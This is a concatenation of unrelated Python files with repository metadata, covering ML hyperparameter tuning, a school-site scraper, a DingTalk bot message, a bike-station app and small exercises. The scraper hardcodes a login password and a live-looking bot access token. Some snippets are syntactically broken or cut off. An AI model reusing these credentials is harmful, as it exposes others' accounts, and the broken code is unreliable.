def train_xgb_model(param_dict, Xtrain, Xvalid, Ytrain, Yvalid,
metric=roc_auc_score, model_type='classification'):
"""
Function to train an XGBoost model with a given set of hyper-parameters
:param param_dict: Dict of hyper-parameters that are kept constant
:param Xtrain: Train Data
:param Xvalid: Validation Data
:param Ytrain: Train labels
:param Yvalid: Validation labels
:param metric: Metric to compute model performance on
:param model_type: Model type - classification/regression
:return: Tuned model, train score and validation score computed using the metric
"""
if model_type == 'classification':
model = XGBClassifier(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict_proba(Xtrain)
valid_preds = model.predict_proba(Xvalid)
train_score = metric(Ytrain, train_preds[:, 1])
valid_score = metric(Yvalid, valid_preds[:, 1])
elif model_type == 'regression':
model = XGBRegressor(**param_dict)
model.fit(Xtrain, Ytrain)
train_preds = model.predict(Xtrain)
valid_preds = model.predict(Xvalid)
train_score = metric(Ytrain, train_preds)
valid_score = metric(Yvalid, valid_preds)
else:
raise ValueError('Incorrect model_type. Accepted values - classification and regression')
return model, train_score, valid_score
def train_model_regularized_encoding(train, valid, target_col, params, cat_cols, enc_folds=5,
metric=mean_squared_error, model='xgb', model_type='regression'):
"""
Function to perform model training with support for regularised mean encoding
:param train: Input dataset to train model on
:param valid: Validation dataser
:param target_col: target column name
:param params: Set of hyper-parameters over which the model is to be tuned
sklearn ParameterGrid object
:param cat_cols: categorical columns for mean encoding
:param enc_folds: Number of folds to be used for regularized encoding
:param metric: Metric to evaluate model performance on
:param model: String indicating the type of model (linear, rf, xgb)
:param model_type: Type of model, regression or classification
:return: Trained model, train and validation scores
"""
train_df = train.copy()
valid_df = valid.copy()
train_cats(train_df)
apply_cats(valid_df, train_df)
for col in cat_cols:
train_df = regularized_target_encoding(train_df, col, target_col, splits=enc_folds)
valid_df = mean_encoding_test(valid_df, train_df, col, target_col)
Xtrain, Ytrain = train_df.drop(columns=[target_col]), train_df[target_col]
Xvalid, Yvalid = valid_df.drop(columns=[target_col]), valid_df[target_col]
del train_df
del valid_df
if model == 'linear':
for n, c in Xtrain.items():
# Label encode categorical columns with more than 10 levels
if not is_numeric_dtype(c) and c.nunique() > 10:
Xtrain = numericalize(Xtrain, c, n)
Xvalid = numericalize(Xvalid, c, n)
# One hot encode categorical variables with less than 10 less
Xtrain = pd.get_dummies(Xtrain, dummy_na=True)
Xvalid = pd.get_dummies(Xvalid, dummy_na=True)
# Scale features
std_sclr = StandardScaler()
Xtrain = std_sclr.fit_transform(Xtrain)
Xvalid = std_sclr.transform(Xvalid)
else:
# Convert cateforical variables to numeric representations
for n, c in Xtrain.items():
Xtrain = numericalize(Xtrain, c, n)
for n, c in Xvalid.items():
Xvalid = numericalize(Xvalid, c, n)
if model == 'xgb':
return train_xgb_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
elif model == 'rf':
return train_rf_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
elif model == 'linear':
return train_linear_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
else:
raise ValueError('Incorrect Model, expected rf/xgb/linear')
def train_model_regularized_encoding_cv(train, target_col, param_grid, cat_cols, cv_folds=5,
enc_folds=5, metric=mean_squared_error, model='xgb',
model_type='regression', rf_sample=None):
"""
Function to perform grid search cross-validation with support for regularised mean encoding
:param train: Input dataset Pandas DataFrame
:param target_col: target column name
:param param_grid: Set of hyper-parameters over which the model is to be tuned
sklearn ParameterGrid object
:param cat_cols: categorical columns for mean encoding
:param cv_folds: Number of folds to be used for cross validation
:param enc_folds: Number of folds to be used for regularized encoding
:param metric: Metric to evaluate model performance on
:param model: String indicating the type of model (linear, rf, xgb)
:param model_type: Type of model, regression or classification
:param rf_sample: Number of observations each tree in random forest sees
:return: DataFrame of the parameters explored and corresponding model performance
"""
kf = KFold(cv_folds, random_state=42)
columns = [*param_grid[0].keys()] + ['train_score', 'valid_score']
# Remove class_weight from the columns list
try:
columns.remove('class_weight')
except ValueError:
pass
# Create dataframe with the hyper-parameters as columns
results = pd.DataFrame(columns=columns)
for params in tqdm_notebook(param_grid):
train_scores = list()
valid_scores = list()
for train_idx, test_idx in kf.split(train):
# Split data into train and test
kf_train, kf_test = train.iloc[train_idx], train.iloc[test_idx]
kf_train.reset_index(inplace=True, drop=True)
kf_test.reset_index(inplace=True, drop=True)
train_cats(kf_train)
apply_cats(kf_test, kf_train)
for col in cat_cols:
kf_train = regularized_target_encoding(kf_train, col, target_col, splits=enc_folds)
kf_test = mean_encoding_test(kf_test, kf_train, col, target_col)
Xtrain, Ytrain = kf_train.drop(columns=[target_col]), kf_train[target_col]
Xvalid, Yvalid = kf_test.drop(columns=[target_col]), kf_test[target_col]
if model == 'linear':
for n, c in Xtrain.items():
# Label encode categorical columns with more than 10 levels
if not is_numeric_dtype(c) and c.nunique() > 10:
Xtrain = numericalize(Xtrain, c, n)
Xvalid = numericalize(Xvalid, c, n)
# One hot encode categorical variables with less than 10 less
Xtrain = pd.get_dummies(Xtrain, dummy_na=True)
Xvalid = pd.get_dummies(Xvalid, dummy_na=True)
# Scale features
std_sclr = StandardScaler()
Xtrain = std_sclr.fit_transform(Xtrain)
Xvalid = std_sclr.transform(Xvalid)
else:
# Convert cateforical variables to numeric representations
for n, c in Xtrain.items():
Xtrain = numericalize(Xtrain, c, n)
for n, c in Xvalid.items():
Xvalid = numericalize(Xvalid, c, n)
if model == 'xgb':
_, train_score, valid_score = train_xgb_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
elif model == 'rf':
if rf_sample:
set_rf_samples(rf_sample)
_, train_score, valid_score = train_rf_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
reset_rf_samples()
elif model == 'linear':
_, train_score, valid_score = train_linear_model(params, Xtrain, Xvalid, Ytrain, Yvalid,
metric=metric, model_type=model_type)
else:
raise ValueError('Incorrect Model, expected rf/xgb/linear')
train_scores.append(train_score)
valid_scores.append(valid_score)
to_write = params.copy()
class_weights = to_write.pop('class_weight', None)
if class_weights and class_weights != 'balanced':
try:
for k, v in class_weights.items():
to_write[f'class_{k}'] = v
except AttributeError:
to_write['class_1'] = 'balanced'
to_write['class_0'] = 1
to_write['train_score'] = np.mean(train_scores)
to_write['valid_score'] = np.mean(valid_scores)
results = results.append(pd.DataFrame.from_dict(to_write, orient='index').T)
return results
def choose_params(param_dict, curr_params=None):
"""
Function to choose parameters for next iteration
:param param_dict: Ordered dictionary of hyper-parameter search space
:param curr_params: Dict of current hyper-parameters
:return: Dictionary of sampled parameters
"""
if curr_params:
next_params = curr_params.copy()
param_to_update = np.random.choice(list(param_dict.keys()))
param_vals = param_dict[param_to_update]
curr_index = param_vals.index(curr_params[param_to_update])
if curr_index == 0:
next_params[param_to_update] = param_vals[1]
elif curr_index == len(param_vals) - 1:
next_params[param_to_update] = param_vals[curr_index - 1]
else:
next_params[param_to_update] = \
param_vals[curr_index + np.random.choice([-1, 1])]
else:
next_params = dict()
for k, v in param_dict.items():
next_params[k] = np.random.choice(v)
return next_params
def simulate_annealing(param_dict, const_param, X_train, X_valid,
Y_train, Y_valid, fn_train=train_xgb_model, maxiters=100,
alpha=0.85, beta=1.3, T_0=0.40, update_iters=5):
"""
Function to perform hyper-parameter search using simulated annealing
Detailed explanation at https://github.com/santhoshhari/simulated_annealing
:param param_dict: Ordered dictionary of hyper-parameter search space
:param const_param: Static parameters of the model
:param X_train: Train Data
:param X_valid: Validation Data
:param Y_train: Train labels
:param Y_valid: Validation labels
:param fn_train: Function to train the model
(Should return model and metric value as tuple)
:param maxiters: Number of iterations to perform the parameter search for
:param alpha: factor to reduce temperature
:param beta: constant in probability estimate
:param T_0: Initial temperature
:param update_iters: # of iterations required to update temperature
:return: DataFrame of the parameters explored and corresponding model performance
"""
columns = [*param_dict.keys()] + ['Metric', 'Best Metric', 'Train Metric']
results = pd.DataFrame(index=range(maxiters), columns=columns)
best_metric = -1.
prev_metric = -1.
prev_params = None
best_params = dict()
weights = list(map(lambda x: 10 ** x, list(range(len(param_dict)))))
hash_values = set()
T = T_0
for i in tqdm_notebook(range(maxiters)):
while True:
curr_params = choose_params(param_dict, prev_params)
indices = [param_dict[k].index(v) for k, v in curr_params.items()]
hash_val = sum([i * j for (i, j) in zip(weights, indices)])
if hash_val in hash_values:
tqdm.write('Combination revisited')
else:
hash_values.add(hash_val)
break
all_params = curr_params.copy()
all_params.update(const_param)
model, train_score, valid_score = fn_train(all_params, X_train, X_valid, Y_train, Y_valid)
if valid_score > prev_metric:
tqdm.write(f'Local Improvement in metric from {prev_metric:.4} to {valid_score:.4}' \
+ ' - parameters accepted')
prev_params = curr_params.copy()
prev_metric = valid_score
if valid_score > best_metric:
tqdm.write(f'Global improvement in metric from {best_metric:.4f} to {valid_score:.4}' \
+ ' - best parameters updated')
best_metric = valid_score
best_params = curr_params.copy()
best_model = model
else:
rnd = np.random.uniform()
diff = valid_score - prev_metric
threshold = np.exp(beta * diff / T)
if rnd < threshold:
tqdm.write('No Improvement but parameters accepted. Metric change: ' +
f'{diff:.4} threshold: {threshold:.4} random number: {rnd:.4}')
prev_metric = valid_score
prev_params = curr_params
else:
tqdm.write('No Improvement and parameters rejected. Metric change: ' +
f'{diff:.4} threshold: {threshold:.4} random number: {rnd:.4}')
results.loc[i, list(curr_params.keys())] = list(curr_params.values())
results.loc[i, 'Metric'] = valid_score
results.loc[i, 'Best Metric'] = best_metric
results.loc[i, 'Train Metric'] = train_score
if i % update_iters == 0:
T = alpha * T
return results, best_model, best_params
if __name__ == '__main__':
print('Module can only be imported.')
|
[
"shari@dons.usfca.edu"
] |
shari@dons.usfca.edu
|
1e08e03c5602e773fea189066d6e3c57d3c68264
|
acb4ec8f4e789b2f9ebcb9e93b9b58d53d195df7
|
/python_007.py
|
ef8f2db123550d11c02594e4eb0c6e7ca62773c4
|
[] |
no_license
|
andrewPompa/pjs
|
2948ee69934d242fb79a28b9b9f76db6358ead39
|
f7614ae67b86129aa9152e51230162d61110eeba
|
refs/heads/master
| 2021-03-27T20:05:16.576409
| 2018-01-20T21:26:52
| 2018-01-20T21:26:52
| 105,984,552
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,393
|
py
|
#!/usr/bin/python
# -*- coding: utf-8
# Import module support
import argparse
import os
import string
from functools import reduce
import re
import NumberValidator
import sys
from GrepModule import PatternOccurrences, calculate_occurrences
program_name = sys.argv[0]
class Dir:
def __init__(self, path):
self.path = path
self.phrases = []
def print_help():
print("Przeszukiwacz kartotek %s -d katalog frazy" % program_name)
print("przykład: %s -d ~/lib -d ~/scripts pier -d ~/bin dru" % program_name)
print("frazy - frazy do wyszukania")
def print_error(message):
sys.stderr.write("[ERROR] %s\n" % message)
print_help()
sys.exit(2)
def append_directories_to_search(paths_, phrases_, directories_to_search_):
if paths_ and not phrases_:
print_error("Nie ma fraz dla katalogów do wszukania")
for path_to_search in paths_:
dir_to_search = Dir(path_to_search)
for phrase in phrases_:
dir_to_search.phrases.append(phrase)
directories_to_search_.append(dir_to_search)
if len(sys.argv) == 1:
print_error("Błąd składni")
if sys.argv[1] != "-d":
print_error("Oczekiwano katalogu")
directories_to_search = []
paths = []
phrases = []
sys.argv.pop(0)
while sys.argv:
argument = sys.argv.pop(0)
if argument == "-d" and len(phrases) != 0:
append_directories_to_search(paths, phrases, directories_to_search)
paths = []
phrases = []
if argument == "-d":
if sys.argv:
argument = sys.argv.pop(0)
else:
print_error("Oczekiwano wartości")
paths.append(argument)
continue
phrases.append(argument)
append_directories_to_search(paths, phrases, directories_to_search)
# for directory in directories_to_search:
# print(directory.path),
# print(directory.phrases)
patterns = {}
for pattern_id, phrase in enumerate(phrases):
patterns[phrase + str(pattern_id)] = PatternOccurrences(phrase)
for directory in directories_to_search:
# print("searching in %s" % directory.path)
for root, dirs, files in os.walk(directory.path):
for file_name in files:
# print("File: %s" % file_name)
calculate_occurrences(root + '/' + file_name, patterns)
for key in patterns:
print("%s wystąpił %d razy" % (patterns[key].pattern, patterns[key].occurrences))
|
[
"mijo@ailleron.com"
] |
mijo@ailleron.com
|
b120db8ee5306c60979bd4c6ab69c8226a685263
|
e8e152dacd2d975f2a880c89589e16cf63a80d75
|
/SendMsgToDD/SendToTest.py
|
cf99b9d85e019f9fdd442ef5f64d1c849eeaa9b9
|
[] |
no_license
|
tiger4066/PythonProject
|
d434e754d4ccf7d5e9fc9e49261d7722894b5ad8
|
7dbae45e0bd6817996d8646aa65fcc7544543771
|
refs/heads/master
| 2020-03-23T17:26:16.768104
| 2018-07-22T02:46:05
| 2018-07-22T02:46:05
| 141,859,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,244
|
py
|
import requests
from bs4 import BeautifulSoup
from lxml import etree
import re
url = 'http://lkzx.net/index_main.aspx?tabid=1'
UA = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.13 Safari/537.36"
header = {
"User-Agent": UA,
"Connection":"close" #加上这一行,解决:Failed to establish a new connection: [WinError 10048]
}
v2ex_session = requests.Session()
f = v2ex_session.get(url, headers=header)
'''
xpath方法获取值:对隐藏的不能用浏览器直接获取到xpath的效果不好
tree=etree.HTML(f.content)
nodes=tree.xpath('//*[@id="_ctl2_Btn_Login"]')[0].get('type')
print(nodes)
'''
'''BeautifulSoup方法获取值,不乱码效果正好,可能速度慢一些
soup = BeautifulSoup(f.content,"html.parser")
value = soup.find('input', {'id': '_ctl2_Btn_Login'}).get('value')
print(value)
'''
soup = BeautifulSoup(f.content, "html.parser")
# print(soup)
# 以下两种方法都可以获取到value的值
#value = soup.find('input', {'name': '__VIEWSTATE'})['value']
VIEWSTATE = soup.find('input', {'name': '__VIEWSTATE'}).get('value')
UserName = '林文彪'
UserName = UserName.encode('gb2312')
Btn_Login = '登录'
Btn_Login = Btn_Login.encode('gb2312')
postData = {
'__VIEWSTATE': VIEWSTATE,
'_ctl2:Txt_UserName': UserName,
'_ctl2:Txt_Password': '3874',
'_ctl2:Btn_Login': Btn_Login,
'_ctl8:Txt_Title': ''
}
v2ex_session.post(url,
data=postData,
headers=header)
txt = open('test.txt', 'w', encoding='GBK')
for p in range(1, 2):
#url = 'http://www.lkzx.net/page/message/EN_MessageBox.aspx?pageindex=' + \
# str(p)+'&&action=getbox&&isdel=0'#我的信息列表
url = 'http://www.lkzx.net/Page/Document/EN_DocumentMoreList.aspx?pageindex='+\
str(p)+'&moduleid=138&tabid=12'#通知公告列表
print(url)
f = v2ex_session.get(url, headers=header)
soup = BeautifulSoup(f.content, "html.parser")
# for i in soup.find_all(id=re.compile('_ctl1_DL_AnounceAdmi')):
# for i in soup.find_all(id=re.compile('_ctl1_DL_AnounceAdmin__ctl[1-9][0-9]?_Lbl_Title')):
for i in soup.find_all(id=re.compile('_ctl0_DL_DocumentList__ctl[1-9][0-9]?_tr1')):
# print(type(x)) <tr id="_ctl0_DL_DocumentList__ctl1_tr1
i = i.decode()
#txt.write(i)
pattern = re.compile(r'<span id.*?>(.*?)</span>.*?documentid=(.*?)\".*?title=\"(.*?)\".*?Lbl_ModuleName\">(.*?)</span>',re.S)
items = re.findall(pattern, i)
'''for item in items:
print(item)'''
for item in items:
print(item[0],item[1],item[2],item[3])
# print(soup.get_text())
# print(f.text)
txt.close()
#向群机器人发送消息
#https://oapi.dingtalk.com/robot/send?access_token=718c7852eb9a0687f5559dc4503de013d523c5addf9fd3057eb1de4ba7be426f
mesUrl='https://oapi.dingtalk.com/robot/send?access_token=718c7852eb9a0687f5559dc4503de013d523c5addf9fd3057eb1de4ba7be426f'
data={
"msgtype": "text",
"text": {
"content": "我就是我, 是不一样的烟火"
},
"at": {
"atMobiles": [
"18928686223"
],
"isAtAll": false
}
}
r=requests.post(url=mesUrl,data=data)
print(r.text)
|
[
"tiger406@qq.com"
] |
tiger406@qq.com
|
9bd5ac1d6ba7fc415b10e2563a4e94ebe6f6cd3a
|
c6613d54db965247977a6593af7867c637c73de5
|
/python_函式與參數/function-basic.py
|
91e9bb05c4783fdc1ca7dc82b4b0516b5b1ea272
|
[] |
no_license
|
a0988986570/python_training
|
b7ff11f6b35308d69f055d4805f6a42c20a51a07
|
87f2e4e5a918579d04c0952b05abc75b14098610
|
refs/heads/master
| 2020-07-23T05:42:34.304494
| 2019-09-30T15:54:52
| 2019-09-30T15:54:52
| 207,461,361
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 16 12:26:40 2019
@author: user
"""
#定義函示
#函示內部的程式碼,若是沒有做函示呼叫,就不會執行
def multipy(n1,n2):
print(n1*n2)
#return 10
return n1*n2
#呼叫函示
x=multipy(3,4)
print(x) #函示所得到的值為return回傳的東西,沒有寫return即回傳NONE值
#例子
def multipy1(n1,n2):
return n1*n2
value=multipy1(3,4)+multipy1(10,5)
print(value)
#函示可用來做程式的包裝:即同樣的事情可交由函示去做
def calculate(max):
sum=0
for n in range(1,max+1): #1+...+max
sum=sum+n
print(sum)
calculate(10)
calculate(20)
|
[
"a0988986570@gmail.com"
] |
a0988986570@gmail.com
|
1bfafbcc70873f685f59ae768893dc6f2aadc31d
|
bdf4b83e8b28e3ac552ef7b648d3344e3d52e9fd
|
/checkinclusion.py
|
d204075a4de6bab5491752c4990f5b644f7d66fa
|
[] |
no_license
|
uddipt1507/Applied-Crypto-Merkel-Tree
|
32522af83deaef14abd67a897bbdb45a0ce4e366
|
bbf60e579e582dcaf0b5bdca40f1f1e4e8e93c99
|
refs/heads/master
| 2022-12-17T06:54:55.073573
| 2020-09-12T04:56:30
| 2020-09-12T04:56:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
#!/usr/bin/python3
import ast,sys,hashlib
def parseFile():
f = open("merkle.tree","r")
tree ={}
for line in f:
lineArray = line.split(" ")
if lineArray[0] == 'Parent(concatenation':
tree[lineArray[6]] = lineArray[10]
else:
tree[lineArray[3]] = lineArray[7]
return tree
def checkInclusion(inputString,tree):
out = []
for key,value in tree.items():
if inputString in key:
out.append(value)
inputString = value
return out
inputString = sys.argv[1]
tree = parseFile()
out = checkInclusion(inputString,tree)
if(len(out)> 0):
print("yes",out)
else:
print("no")
|
[
"noreply@github.com"
] |
uddipt1507.noreply@github.com
|
c66a856d70350d3698a0acab1cbc9f1d3152b332
|
9147ff9354b5f5e3cd526408701a9061f64122ad
|
/indy_client/test/agent/test_restore_agent_wallets_from_mgl.py
|
7582687a95b72d6f0498d0cd20257b1537af9f20
|
[
"Apache-2.0"
] |
permissive
|
trongnhan1312400/indy-node
|
07d04e7e880b90b10b99cf0b9bc0df1742917253
|
ca6cda2a049171a98e4758240a00e97ea449ea25
|
refs/heads/master
| 2021-09-01T09:28:43.114840
| 2017-12-26T07:45:30
| 2017-12-26T07:45:30
| 111,093,792
| 0
| 0
| null | 2017-11-17T11:02:14
| 2017-11-17T11:02:13
| null |
UTF-8
|
Python
| false
| false
| 2,325
|
py
|
import os
import shutil
from indy_client.agent.walleted_agent import WalletedAgent
from indy_client.anon_creds.indy_issuer import IndyIssuerWalletInMemory
from indy_client.anon_creds.indy_public_repo import IndyPublicRepo
from indy_client.client.wallet.wallet import Wallet
from indy_client.test.client.TestClient import TestClient
from indy_common.config_util import getConfig
from stp_core.network.port_dispenser import genHa
def test_restore_agent_wallets_from_minimal_go_live(tdirWithPoolTxns):
source_dir = os.path.dirname(os.path.realpath(__file__))
agent_wallet_source_path = os.path.join(
source_dir, 'agent_wallet_from_minimal_go_live')
issuer_wallet_source_path = os.path.join(
source_dir, 'issuer_wallet_from_minimal_go_live')
config = getConfig(tdirWithPoolTxns)
agent_wallets_dir = os.path.join(config.CLI_BASE_DIR, config.walletsDir,
'agents', 'test-agent')
issuer_wallet_dir = os.path.join(agent_wallets_dir, 'issuer')
os.makedirs(issuer_wallet_dir)
shutil.copy(agent_wallet_source_path,
os.path.join(agent_wallets_dir, 'default.wallet'))
shutil.copy(issuer_wallet_source_path,
os.path.join(issuer_wallet_dir, 'issuer.wallet'))
client = TestClient('test-client',
ha=genHa(),
basedirpath=tdirWithPoolTxns)
agent = WalletedAgent('test-agent',
basedirpath=tdirWithPoolTxns,
client=client)
agent_wallet = agent.wallet
assert isinstance(agent_wallet, Wallet)
agent_connections = agent_wallet.getConnectionNames()
assert len(agent_connections) == 3
assert 'Acme Corp' in agent_connections
assert 'Faber College' in agent_connections
assert 'Thrift Bank' in agent_connections
issuer_wallet = agent.issuer.wallet
assert isinstance(issuer_wallet, IndyIssuerWalletInMemory)
assert isinstance(issuer_wallet._repo, IndyPublicRepo)
assert isinstance(issuer_wallet._repo.wallet, Wallet)
issuer_connections = issuer_wallet._repo.wallet.getConnectionNames()
assert len(issuer_connections) == 3
assert 'Acme Corp' in issuer_connections
assert 'Faber College' in issuer_connections
assert 'Thrift Bank' in issuer_connections
|
[
"alexander.sherbakov@dsr-company.com"
] |
alexander.sherbakov@dsr-company.com
|
43afce7b0e3fae4644204ede82202e1ae5a28b16
|
633546536aa4fe5566132c2c3407d673280abd87
|
/programas5-spa/programa-5-2.py
|
3551154a68747f2c29a966f455581e31d73011ab
|
[] |
no_license
|
aoliverg/python
|
dbcaa823b8b84fd6b769c2f1f8f7f6525c307ba8
|
6562a4422f1b18894a82f484bfa443d489880eb9
|
refs/heads/master
| 2023-03-06T17:02:32.749467
| 2021-02-13T12:11:03
| 2021-02-13T12:11:03
| 294,938,607
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
freglas=open("reglas.txt","r")
reglas=[]
while True:
linea=freglas.readline().rstrip()
if not linea:break
reglas.append(linea)
freglas.close()
fdiccionario=open("diccionario.txt","r")
while True:
linea=fdiccionario.readline().rstrip()
if not linea:break
(lema,tipo)=linea.split(":")
for regla in reglas:
(tf,tl,etiqueta,tipo2)=regla.split(":")
if ((tipo2 == tipo)&(lema.endswith(tl))):
print(lema[0:(len(lema)-len(tl))]+tf,lema,etiqueta)
fdiccionario.close()
|
[
"aoliverg@uoc.edu"
] |
aoliverg@uoc.edu
|
5589f7ffc74fc2142a33e4fa79fcad95a8313766
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_150/ch5_2020_03_17_15_11_34_348553.py
|
92239ab555449c872530a273fdcd1e75e9c8ca77
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 85
|
py
|
def libras_para_kg(libras):
kilograma = libras / 2,2046
return kilograma: .6f
|
[
"you@example.com"
] |
you@example.com
|
27d66697edb600f44c2bcbbecb60b39672cf4605
|
004572785d95142d4639eec6b3f058ea8accc5f1
|
/App dev files/App_code.py
|
912bab7af881fb62e75533b4d6ac0271dc42b185
|
[] |
no_license
|
aagarwal4/bay-area-bike-share
|
cd8f8d48813759d2faecf13031d3f3fb220abbd0
|
06cd888b141e6671214dbf03d6896a8b2e03b902
|
refs/heads/master
| 2021-09-09T02:07:58.966351
| 2018-03-13T09:51:44
| 2018-03-13T09:51:44
| 117,250,856
| 0
| 4
| null | 2018-03-13T09:51:45
| 2018-01-12T14:32:31
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,355
|
py
|
from Tkinter import Tk, Label, Button
from Tkinter import *
import requests
import csv
import geopy.distance
import pandas as pd
import urllib
import simplejson
try:
import Tkinter as tk
import tkFont
import ttk
except ImportError: # Python 3
import tkinter as tk
import tkinter.font as tkFont
import tkinter.ttk as ttk
fields = ['Hour', 'Date']
OPTIONS = [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 ,12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23],
['01-19-2018', '01-20-2018', '01-21-2018', '01-22-2018', '01-23-2018', '01-24-2018']]
def app_lookup(vals):
#address = raw_input("Enter your address: ")
#address = "101 Howard Street, San Francisco"
address = vals[0]
api_key = ***
api_response = requests.get('https://maps.googleapis.com/maps/api/geocode/json?address={0}&key={1}'.format(address, api_key))
api_response_dict = api_response.json()
if api_response_dict['status'] == 'OK':
latitude = api_response_dict['results'][0]['geometry']['location']['lat']
longitude = api_response_dict['results'][0]['geometry']['location']['lng']
mylist = []
with open('station.csv','rb') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
mylist.append(tuple(row[1:4]))
station_google_info = pd.DataFrame(columns = ['station_name','distance','duration', 'distance_value'])
for station in mylist[1:]:
url = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins={0}&destinations={1}&key={2}&mode=walking'.format(str(latitude)+','+str(longitude), str(station[1])+','+str(station[2]), api_key)
distance_response_dict = simplejson.load(urllib.urlopen(url))
if distance_response_dict['status'] == 'OK':
station_google_info = station_google_info.append({'station_name': station[0], 'distance': distance_response_dict['rows'][0]['elements'][0]['distance']['text'],
'duration':distance_response_dict['rows'][0]['elements'][0]['duration']['text'],
'distance_value': distance_response_dict['rows'][0]['elements'][0]['distance']['value']}, ignore_index=True)
stations_df = station_google_info.sort_values('distance_value', ascending = 1).head()
df = pd.read_csv("Predictions.csv")
filtered_df = df[(df['station_name'].isin(stations_df['station_name'])) & (df['hour'] == int(vals[1])) & (df['date'] == vals[2])]
filtered_df = filtered_df.join(stations_df.set_index('station_name'), on = 'station_name').sort_values('metric', ascending = 0)
filtered_df['rank'] = range(1,len(filtered_df)+1)
return filtered_df[['rank', 'station_name', 'distance', 'duration', 'metric']]
def makeform(root, fields, OPTIONS):
entries = []
row = Frame(root)
lab = Label(row, width=15, text='Location', anchor='w')
ent = Entry(row)
row.pack(side=TOP, fill=X, padx=5, pady=5)
lab.pack(side=LEFT)
ent.pack(side=RIGHT, expand=YES, fill=X)
entries.append(('Location', ent))
for i in range(0, 2):
variable = StringVar(root)
variable.set(OPTIONS[i][0]) # default value
row = Frame(root)
lab = Label(row, width=15, text=fields[i], anchor='w')
lab.pack(side=LEFT)
w = OptionMenu(row, variable, *OPTIONS[i])
w.pack(side=LEFT)
row.pack(side=TOP, fill=X, padx=5, pady=5)
entries.append((fields[i], variable))
#val = variable.get()
return entries
def fetch(entries):
#global entries
vals = []
for entry in entries:
field = entry[0]
text = entry[1].get()
print('%s: "%s"' % (field, text))
vals.append(text)
if vals[0] != "":
df = app_lookup(vals)
print vals[0]
# car_header = list(df.columns.values)
print df
car_list = [tuple(row[1]) for row in df.iterrows()]
for col in car_header:
tree.heading(col, text=col.title())
for item in car_list:
tree.insert('', 'end', values=item)
return vals
def reset_station():
# listbox.delete(0, END)
#listbox.insert(END, '')
tree.delete(*tree.get_children())
if __name__ == '__main__':
root = Tk()
Label(root, text = "GoBike Station Recommendation", fg = "blue", font = "Verdana 20 bold").pack()
# listbox = Listbox(root, width = 150, height = 10)
# listbox.pack(expand = True)
ents = makeform(root, fields, OPTIONS)
root.bind('<Return>', (lambda event, e=ents: fetch(e)))
global vals
vals = fetch(ents)
print vals
fm = Frame(root)
b1 = Button(fm, text='Show', command=(lambda e=ents: fetch(e)))
b1.pack(side=LEFT, padx=5, pady=5)
# lb = Listbox(root)
b = Button(fm, text="Reset",
command=reset_station)
b.pack(side=LEFT, padx=5, pady=5)
fm.pack(fill=BOTH, expand = YES)
car_header = ['rank', 'station_name', 'distance', 'duration', 'metric']
root.title("GoApp")
container = ttk.Frame()
container.pack(fill='both', expand=True)
tree = ttk.Treeview(columns=car_header, show="headings")
tree.grid(column=0, row=0, sticky='nsew', in_=container)
container.grid_columnconfigure(0, weight=1)
container.grid_rowconfigure(0, weight=1)
root.mainloop()
|
[
"djohn@dons.usfca.edu"
] |
djohn@dons.usfca.edu
|
2fa288aea4a3deb75788391f00ca6fa38d7e4d35
|
a7defc517f9a007425ac411468169e6177b0186c
|
/learntools/emotiv/skmodel.py
|
313df15ddbc006cae6d9d7d994383893950b962e
|
[
"MIT"
] |
permissive
|
yueranyuan/vector_edu
|
6f9b9b6a26b1a9c0aa95f2da752fd532c4c22186
|
259ff50479ebd5e12136554f1cd47bff149fa15c
|
refs/heads/master
| 2016-09-05T15:41:31.135701
| 2015-06-06T15:00:42
| 2015-06-06T15:00:42
| 27,746,530
| 3
| 3
| null | 2015-03-07T03:04:20
| 2014-12-09T02:51:03
|
Python
|
UTF-8
|
Python
| false
| false
| 2,497
|
py
|
from __future__ import division
import numpy as np
from sklearn.decomposition import PCA
from learntools.libs.logger import log
from learntools.model import Model
from learntools.libs.auc import auc
class SKModel(Model):
def __init__(self, prepared_data, classifier, pca_components=None, pca_percentage=None, **kwargs):
# 1: Organize data into batches
ds, train_idx, valid_idx = prepared_data
xs = ds.get_data('eeg')
ys = ds.get_data('condition')
self.train_x = xs[train_idx]
self.train_y = ys[train_idx]
self.valid_x = xs[valid_idx]
self.valid_y = ys[valid_idx]
self.c = classifier
# setup PCA
if pca_percentage:
pca_components = self.train_x.shape[1] * pca_percentage
if pca_components:
self.pca = PCA(n_components=pca_components)
else:
self.pca = None
def train_full(self, strategy=None, **kwargs):
return super(SKModel, self).train_full(strategy=train_skmodel)
def serialize(self):
return self.c
def predict(self, x):
return self.c.predict(x)
@property
def validation_predictions(self):
return self.predict(self.valid_x)
def train_skmodel(model, average_n_predictions=None, binarize=False, **kwargs):
train_x = model.train_x
valid_x = model.valid_x
if model.pca:
train_x = model.pca.fit_transform(train_x)
valid_x = model.pca.transform(valid_x)
model.c.fit(train_x, model.train_y)
